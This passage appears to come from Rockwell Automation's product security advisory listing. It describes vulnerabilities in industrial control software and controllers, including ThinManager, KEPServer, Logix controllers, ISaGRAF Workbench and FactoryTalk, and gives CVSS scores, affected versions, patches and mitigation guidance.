This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

Administrator privileges are needed for this attack to be successful on ThinManager Software.

CVSS v3.1 Base Score: 4.9/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected	Suggested Actions
ThinManager	This issue has been patched. Customers should follow the patch instructions as follows: If using v12.0.0-12.0.2 >> Download v12.0.3 If using v12.1.0-12.1.3 >> Download v12.1.4
Factory Talk Linx Gateway	Customers should view BF28103 - Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.
Factory Talk Linx OPC UA Connector	Customers should view BF28103 - Everyone Patch: OpenSSL Vulnerability, OPC UA Connector 6.20, 6.21, 6.30 to install the update that mitigates the issue.
Factory Talk View	Customers should view BF28297 - Patch: Open SSL Vulnerability, FactoryTalk View 11.0, 12.0, 13.0 to install the update that mitigates the issue.
Stratix 4300	The issue has been patched. Customers should upgrade to v4.0.2.101 Download Center

If an upgrade is not possible or available, customers should consider implementing the following mitigations:

Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Additional Links

High

PN1604 | PN1604 | ThinManager Software Vulnerable to Arbitrary Code Execution and Denial-Of-Service Attack

Published Date:

September 22, 2022

Last Updated:

September 22, 2022

CVE IDs:

CVE-2022-38742

Products:

ThinManager

CVSS Scores:

8.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – September 22, 2022 – Initial Version

Executive Summary

A vulnerability was discovered by rgod working with Trend Micro’s Zero Day Initiative and reported to Rockwell Automation. The vulnerability was discovered in the ThinManager® ThinServer™ software. Successful exploitation of this vulnerability could allow an attacker to make the software unresponsive or execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including recommended countermeasures, are listed below.

Affected Products

ThinManager ThinServer software	Versions
	11.0.0 – 11.0.4
	11.1.0 – 11.1.4
	11.2.0 – 11.2.5
	12.0.0 – 12.0.2
	12.1.0 – 12.1.3
	13.0.0

Vulnerability Details

CVE 2022-38742 ThinManager ThinServer Heap-Based Overflow

CVSS Base Score: 8.1 /10 (High)
CVSS 3.1 Vector String: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

In affected versions, an attacker can send a specifically crafted TFTP or HTTPS request causing a heap-based buffer overflow that crashes the ThinServer process. This potentially exposes the server to arbitrary remote code execution.

Risk Mitigation & User Action

Customers are directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE-2022-38742	Versions Affected	Suggested Actions
	11.0.0 – 11.0.4	Update to v11.00.05
	11.1.0 – 11.1.4	Update to v11.01.05
	11.2.0 – 11.2.5	Update to v11.02.06
	12.0.0 – 12.0.2	Update to v12.00.03
	12.1.0 – 12.1.3	Update to v12.01.04
	13.0.0	Update to v13.00.01

Additional Mitigations

If users are unable to update to the patched version, they should put the following mitigation in place:

Block network access to the ThinManager TFTP and HTTPS ports from endpoints other than ThinManager managed thin clients

For additional security best practices, please see our Knowledgebase article,QA43240 - Security Best Practices, to maintain the security posture of your environment.

References

CVE-2022-38742

Critical

PN1603 | PN1603 | KEPServer Enterprise Vulnerable to Remote Code Execution and Denial-of-Service Attack

Published Date:

September 01, 2022

Last Updated:

September 01, 2022

CVE IDs:

CVE-2022-2825, CVE-2022-2848

Products:

Kepserver Enterprise

CVSS Scores:

9.1, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – September 1, 2022 – Initial Version

Executive Summary

Rockwell Automation was notified by ICS-CERT of vulnerabilities discovered in Kepware® KEPServerEX, which affects the Rockwell Automation KEPServer Enterprise. Successful exploitation of these vulnerabilities could allow an attacker to crash the device or remotely execute arbitrary code.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details are provided relating to the discovered vulnerabilities, including recommended countermeasures.

Affected Products

KEPServer Enterprise – All versions prior to v13.01.00

Vulnerability Details

CVE 2022-2848 KEPServer Enterprise Heap-Based Overflow
CVSS Base Score: 9.1 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and
leak data.

CVE 2022-2825 KEPServer Enterprise Stack-Based Overflow
CVSS Base Score: 9.8 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and remotely execute code.

Risk Mitigation & User Action

Vulnerability	Suggested Actions
CVE-2022-2848	Customers should update to version 13.01.00 which mitigates these issues
CVE-2022-2825

If a customer is unable to update to the mitigated version, it is suggested that Security Best Practices are followed as outlined in our Knowledgebase article, QA43240 - Security Best Practices.

General Security Guidelines

References

CVE-2022-2848
CVE-2022-2825
ICSA-22-242-10 Advisory

Medium

PN1598 | PN1598 | CVE 2022-1096 Chromium Type Confusion Vulnerability Impact Multiple Products

Published Date:

August 26, 2022

Last Updated:

August 26, 2022

CVE IDs:

CVE-2022-1096

Products:

Using CCW with PanelView Component Terminals, FactoryTalk Linx Gateway, FactoryTalk View SE, Installing CCW, FactoryTalk Linx / RSLinx Enterprise, PowerFlex 6000, Using CCW with Micro800 Controllers, Using CCW with Component Class Drives

CVSS Scores:

4.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Reference

CVE 2022-1096

Revision History

Revision Number

1.1

Revision History

Version 1.0 – July 12, 2022
Version 1.1 – August 26, 2022 Updated FT View Site Edition Mitigation Instructions

Executive Summary

Rockwell Automation is aware of multiple products that use the Chromium web browser and are affected by CVE 2022-1096, which is a zero day type confusion vulnerability. Exploitation of this vulnerability could potentially lead to a low impact to the availability of the targeted device. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Customers using the products in scope are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerabilities including recommended countermeasures, are provided.

Affected Products

Product in Scope	Vulnerable Component
FactoryTalk^® Linx Enterprise software v6.20, 6.21, and 6.30	V6.21	CefSharp v73.1.130 (EIPCACT feature)
	V6.30	CefSharp v91.1.230 (EIPCACT feature)
	v6.20	CefSharp v73.1.130 (Device Config feature)
	v6.21	CefSharp v73.1.130 (Device Config feature
	v6.30	CefSharp v73.1.130 (Device Config feature
Enhanced HIM (eHIM) for PowerFlex^® 6000T drives v1.001	Electron v4.2.12
Connected Components Workbench^™ software v11, 12,13 & 20 Note: Drives Trending 1.00.00 and 2.00.00 uses Connected Components Workbench	Cefsharp V81.3.100
FactoryTalk Link Gateway software v6.21 and v6.30	v6.21	CefSharp v73.1.130
FactoryTalk Link Gateway software v6.21 and v6.30	v6.30	CefSharp v91.1.230
FactoryTalk View Site Edition software v.13.0	WebView2 v96.0.1054.43

Vulnerability Details

Rockwell Automation has been made aware of a third-party vulnerability that is present in multiple vendor components, which our products use. Due to the way Rockwell Automation uses the Chromium web browser, exploitation of this vulnerability may cause the vulnerable products to become unavailable temporarily. As a result, we adjusted the CVSS Score to reflect how this vulnerability affects our products.

CVE 2022-1096 Chromium Web Browser Type Confusion Vulnerability
CVSS Base Score: 4.0 /10 (Medium)
CVSS 3.1 Vector String: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated firmware becomes available.

For customers using the FactoryTalk View Site Edition follow the recommended actions to address the vulnerability:

Do not use the FactoryTalk View SE web browser control if it is not required for the intended use of the product.
Customers utilizing the SE Web Browser can manually download and apply the newer version of WebView2 by using the following directions:
- Replace the Microsoft® msedgewebview2.exe file that is saved in the C:Program Files (x86)Rockwell SoftwareRSView EnterpriseMicrosoft.WebView2.FixedVersionRuntime by copying and pasting the new version of the software into the folder.
- DO NOT remove the contents of the folder before pasting the new file.

For customers using the Enhanced HIM (eHIM) for Power Flex 6000T drives follow the recommended actions to address the vulnerability:

Update the Microsoft Edge browser to Version 99.0.1150 or later. Additionally, apply the update for eHIM when it becomes available to mitigate the vulnerability.

If applying the mitigations, noted above, is not possible please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

Critical

PN1550 | PN1550 | CVE-2021-22681: Authentication Bypass Vulnerability Found in Logix Controllers

Published Date:

July 20, 2022

Last Updated:

July 20, 2022

CVE IDs:

CVE-2021-22681

Products:

SoftLogix5800, 1794 FlexLogix, 1756 ControlLogix, 1769 CompactLogix Controllers, 1769 Compact GuardLogix 5370, 1768 CompactLogix Controllers, 5069 Compact GuardLogix 5380, RSLogix 5000 / Studio 5000 Logix Designer

CVSS Scores:

10.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.4

Revision History

Version 1.0 - February 25, 2021. Initial Release.
Version 1.2 - March 5, 2021. Updated for clarity.
Version 1.3 - May 5, 2021. Mitigations updated – 1783-CSP CIP Security Proxy.
Version 1.4 - July 20, 2022. Rearranged placement of general mitigations

Executive Summary

Researchers found that our Studio 5000 Logix Designer^® software may allow a key to be discovered. This key is used to verify Logix controllers are communicating with Rockwell Automation design software. If successfully exploited, this vulnerability could allow an unauthorized application to connect with Logix controllers. To leverage this vulnerability, an unauthorized user would require network access to the controller.

FactoryTalk^® Security provides user authentication and authorization for a particular set of actions within RSLogix^® 5000 and Studio 5000^®. Once the application is authorized to open and connect to the controller within RSLogix 5000 or Studio 5000 this verification mechanism, referenced above, is leveraged to establish the connection to the controller. For customers concerned with user access control and who have deployed FactoryTalk Security, this vulnerability may allow an attacker to bypass the protections provided by FactoryTalk Security.

This vulnerability was independently co-discovered by Lab of Information Systems Security Assurance (Eunseon Jeong, Youngho An, Junyoung Park, Insu Oh, Kangbin Yim) of Soonchunhyang University, Kaspersky, and by Claroty, a cybersecurity technology vendor and partner of Rockwell Automation.

Affected Products

Software:
RSLogix 5000 software v16-20, Studio 5000 Logix Designer v21 and later, and corresponding Logix controllers running these versions.
FactoryTalk Security, part of the FactoryTalk Services Platform, if configured and deployed v2.10 and later.

Controllers:
1768 CompactLogix™
1769 CompactLogix
CompactLogix 5370
CompactLogix 5380
CompactLogix 5480
ControlLogix 5550
ControlLogix^® 5560
ControlLogix 5570
ControlLogix 5580
DriveLogix™ 5730
FlexLogix™ 1794-L34
Compact GuardLogix^® 5370
Compact GuardLogix 5380
Guardlogix 5560
GuardLogix 5570
GuardLogix 5580
SoftLogix™ 5800

Vulnerability Details

CVE-2021-22681: Private Key Extraction
Studio 5000 Logix Designer uses a key to verify Logix controllers are communicating with Rockwell Automation products. If successfully exploited, this vulnerability could allow a remote, unauthenticated attacker to bypass a verification mechanism and authenticate with Logix controllers. If exploited, this vulnerability could enable an unauthorized third-party tool to make changes to the controller configuration and/or application code.

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

For details and further mitigation options, please see the table below.

Product Family and Version	Risk Mitigation and Recommended User Actions
ControlLogix 5580 v32 or later.	Put the controller mode switch to “Run” mode. If the above cannot be deployed, the followings mitigations are recommended: Deploy CIP Security for Logix Designer application connections through the front port. CIP Security prevents unauthorized connections when deployed properly. If not using the front port, use a 1756-EN4TR ControlLogix EtherNet/IP™ module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which prevents unauthorized connections when properly deployed.
ControlLogix 5580 v31	Put the controller mode switch to “Run” mode.I If the above cannot be deployed, the following mitigations are recommended: Apply v32 or later and follow mitigations actions outlined above. If unable to apply a newer version, use a 1756-EN4TR ControlLogix EtherNet/IP module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.
ControlLogix 5570 v31 or later.	Put the controller mode switch to “Run” mode. If the above cannot be deployed, the following mitigations are recommended: Use a 1756-EN4TR ControlLogix EtherNet/IP Module and deploy CIP Security. The 1756-EN4TR supports CIP Security, which helps prevent unauthorized connections when properly deployed.
CompactLogix 5380 v28 or later.	Put the controller mode switch to “Run” mode. If the above cannot be deployed, the following mitigations are recommended: Install the 1783-CSP CIP Security Proxy to provide secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual (link).
CompactLogix 5370 v20 or later	Put the controller mode switch to “Run” mode. If the above cannot be deployed, the following mitigations are recommended: Install the 1783-CSP CIP Security Proxy to provide secure connection between the engineering workstation and the controller. For more information, please see the 1783-CSP CIP Proxy User Manual (link).
ControlLogix 5580 v28-v30 ControlLogix 5570 v18 or later ControlLogix 5560 v16 or later ControlLogix 5550 v16 GuardLogix 5580 v31 or later GuardLogix 5570 v20 or later GuardLogix 5560 v16 or later 1768 CompactLogix v16 or later 1769 CompactLogix v16 or later CompactLogix 5480 v32 or later Compact GuardLogix 5370 v28 or later Compact GuardLogix 5380 v31 or later FlexLogix 1794-L34 v16 DriveLogix 5370 v16 or later	Put the controller mode switch to “Run” mode.
SoftLogix 5800	No additional mitigation available. Follow the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide.

Detection Strategies:
In addition, customers can continue to use the methods below to detect changes to configuration or application files:

Monitor controller change log for any unexpected modifications or anomalous activity.
If using v17 or later, utilize the Controller Log feature.
If using v20 or later, utilize Change Detection in the Logix Designer Application.
If available, use the functionality in FactoryTalk^® AssetCentre software to detect changes.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Consult the product documentation for specific features, such as a hardware Mode Switch setting, which may be used to block unauthorized changes, etc.

Social Engineering Mitigation Strategies

Do not click on or open URL links from untrusted sources.
Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations

Customers using the affected products are directed towards risk mitigation and are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.

Rockwell Automation has determined that this vulnerability cannot be mitigated with a patch. Rockwell Automation encourages customers to implement the mitigation strategies outlined in this disclosure.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage this vulnerability, an unauthorized user requires network access to the controller. Customers should confirm that they are employing proper networking segmentation and security controls. Including, but not limited to:

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
Minimizing network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet.
Locating control system networks and devices behind firewalls and isolating them from the enterprise/business network.
Restricting or blocking traffic on TCP 44818 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.

Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide (Publication ENET-TD001E) for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines (Publication secure-rm001) on how to use Rockwell Automation products to improve the security of their industrial automation systems.

CIP Security mitigates this vulnerability as it provides the ability to deploy TLS and DTLS based secure communications to supported products. CIP Security is an enhancement to the ODVA EtherNet/IP industrial communication standard and directly addresses the vulnerability noted in this disclosure. CIP Security allows for users to leverage and manage certificates and/or pre-shared keys and does not make use of any hardcoded keys.

As of May 5, 2021, a new mitigation option is now available. The 1783-CSP CIP Security Proxy is a standalone hardware solution that provides CIP Security for devices that do not natively support CIP Security. See below for how this product can be deployed to address CompactLogix based applications.

Customers requiring setup or deployment guidance for CIP Security protocol should refer to the CIP Security deployment refence guide (Publication secure-at001) for more information.

*Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1600 | PN1600 | ISaGRAF Workbench Vulnerable to Multiple Phishing-Style Attacks

Published Date:

July 20, 2022

Last Updated:

July 20, 2022

CVE IDs:

CVE-2022-2463, CVE-2022-2465, CVE-2022-2464

Products:

AADvance, ISaGRAF, Trusted

CVSS Scores:

6.1, 7.7, 8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – July 19, 2022
Version 1.1 – July 20, 2022 – Added AAdvance Trusted SIS Workstation to products affected

Executive Summary

Rockwell Automation received a report from Claroty regarding three vulnerabilities in ISaGRAF® Workbench. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction such as a phishing attack for successful exploitation.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

ISaGRAF Workbench v6.0 though v6.6.9
AADvance-Trusted Safety Instrumented System Workstation v1.1 and below

Vulnerability Details

CVE-2022—2465: Deserialization of untrusted data may result in arbitrary code execution

ISaGRAF Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in ISaGRAF Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2464: Directory traversal vulnerability may lead to privilege escalation

The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that, when opened by ISaGRAF Workbench, can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions of the ISaGRAF Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2463: Improper input sanitization may lead to privilege escalation

ISaGRAF does not sanitize paths specified within the .7z exchange file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .7z exchange file that when opened by ISaGRAF Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Product	Suggested Actions
CVE-2022-2463 CVE-2022-2464 CVE-2022-2465	ISaGRAF Workbench	Upgrade to ISaGRAF Workbench v6.6.10 or later.
CVE-2022-2463 CVE-2022-2464	AAdvance-Trusted SIS Workstation	Upgrade to AADvance-Trusted SIS Workstation 1.2 or later
CVE-2022-2465	AAdvance-Trusted SIS Workstation	It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.

If immediate upgrade is not possible, customers should consider implementing the following mitigations:

Run ISaGRAF Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Do not open untrusted .7z exchange files with ISaGRAF Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

If applying the mitigations noted above, is not possible please see our Knowledgebase article, QA43240 – Security Best Practices, for additional recommendations to maintain the security posture of your environment.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Critical

PN1599 | PN1599 | FactoryTalk Analytics DataView Vulnerable to Spring4Shell Vulnerability (CVE 2022-22965)

Published Date:

July 14, 2022

Last Updated:

July 14, 2022

Products:

FactoryTalk Analytics DataView

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – July 14, 2022

Executive Summary

Rockwell Automation was made aware of a zero-day vulnerability that impacts the Spring Core Framework. If exploited, this vulnerability could potentially have a high impact on the confidentiality, integrity, and availability of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including products in scope, impact, and recommended countermeasures are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

FactoryTalk® Analytics™ DataView v.3.03.01 and below

Vulnerability Details

Rockwell Automation was made aware of a third-party remote code execution vulnerability that exists in the Spring Core Framework. This vulnerability could potentially allow an attacker to send a specially crafted request to a vulnerable server. To exploit this vulnerability, the target application must run on a Tomcat as a WAR deployment. However, due to the nature of the vulnerability, other ways to exploit it may exist.

CVSS Base Score: 9.8 /10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated firmware becomes available. Please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

NVD - cve-2022-22965 (nist.gov)

Medium

PN1597 | PN1597 | MicroLogix 1400/1100 Vulnerable to Clickjacking Vulnerability

Published Date:

July 07, 2022

Last Updated:

July 07, 2022

CVE IDs:

CVE-2022-2179

Products:

1763 MicroLogix 1100, 1766 MicroLogix 1400

CVSS Scores:

6.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – July 7, 2022

Executive Summary

Rockwell Automation received a vulnerability report from Pawan V. Sable and Pranita Sadgir, and Dr. Faruk Kazi of COE-CNDS from Veermata Jijabai Technological Institute (VJTI) India. If exploited, this vulnerability could potentially have a high impact on the confidentiality of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided herein. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

MicroLogix™ 1400 v. 21.007 and below
MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the X-Frame-Options header is not configured in the HTTP response and allows potential clickjacking attacks. Exploitation of this vulnerability could potentially allow a malicious user to trick a legitimate user into using an untrusted website. If exploited, this vulnerability could lead to a loss of sensitive information, such as authentication credentials.

(CVE 2022 - 2179) MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 6.5 /10 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.

Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device)
Configure firewalls to disallow network communication through HTTP/Port 80

If applying the mitigations noted above are not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

CVE-2022-2179

Medium

PN1596 | PN1596 | Logix Controllers Vulnerable to Denial-of-Service Attack

Published Date:

June 17, 2022

Last Updated:

June 17, 2022

CVE IDs:

CVE-2022-1797

Products:

1769 Compact GuardLogix 5370, 1756/5069 GuardLogix, 1768/1769/5069 CompactLogix, 1756 ControlLogix

CVSS Scores:

6.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.4

Revision History

Version 1.0 – May 24, 2022
Version 1.1 – June 3, 2022 Updated suggested actions and removed versions for clarity
Version 1.2 – June 17, 2022 Clarified vulnerability details and updated risk mitigation section
Version 1.3 – July 8th, 2022 Updated risk mitigation section
Version 1.4 – July 17th, 2023 Updated risk mitigation section

Executive Summary

Rockwell Automation was made aware of a vulnerability within our Logix controllers. This vulnerability may allow an unauthorized user to send malicious messages to the targeted device, which could potentially, lead to a denial-of-service.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

CompactLogix™ 5380 controllers
Compact GuardLogix® 5380 controllers
CompactLogix 5480 controllers
ControlLogix® 5580 controllers
GuardLogix 5580 controllers
CompactLogix 5370 controllers
Compact GuardLogix 5370 controllers
ControlLogix 5570 controllers
GuardLogix 5570 controllers

Vulnerability Details

CVE-2022-1797 Rockwell Automation Logix controllers are vulnerable to denial-of-service attack
A vulnerability that exists in the Logix controller may allow an attacker to modify a message instruction control structure that could cause a denial-of-service condition due to a major nonrecoverable fault. If the controller experiences a major nonrecoverable fault, a user will have to clear the fault and redownload the user project file to bring the device back online and continue normal operations.

CVSS v3.1 Base Score: 6.8/10[MEDIUM]
 CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers can apply either mitigation A or B to address this vulnerability. Customers are directed towards the risk mitigation provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected	Version Affected	Suggested Actions
CompactLogix 5380	Versions prior to 32.016	Mitigation A: Customers should upgrade to version 32.016 firmware or later to mitigate this issue. Mitigation B: Set the message control structures access to read-only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.
Compact GuardLogix 5380
CompactLogix 5480
ControlLogix 5580
GuardLogix 5580

CompactLogix 5370	Versions prior to 33.016	Mitigation A: Customers should upgrade to version 33.016 firmware or later to mitigate this issue. Mitigation B: Set the message control structures access to read only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.
Compact GuardLogix 5370
ControlLogix 5570
GuardLogix 5570

ControlLogix 5570 Redundancy	Versions prior to 33.053	Mitigation A: Customers should upgrade to version 33.053 firmware or later to mitigate this issue. Mitigation B: Set the message control structures access to read only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.

If applying mitigation A or B is not possible, customers should consider implementing the following solutions:

Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with products from Rockwell Automation is available at Knowledgebase article QA17329 - Using Rockwell Automation Software Products with AppLocker.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

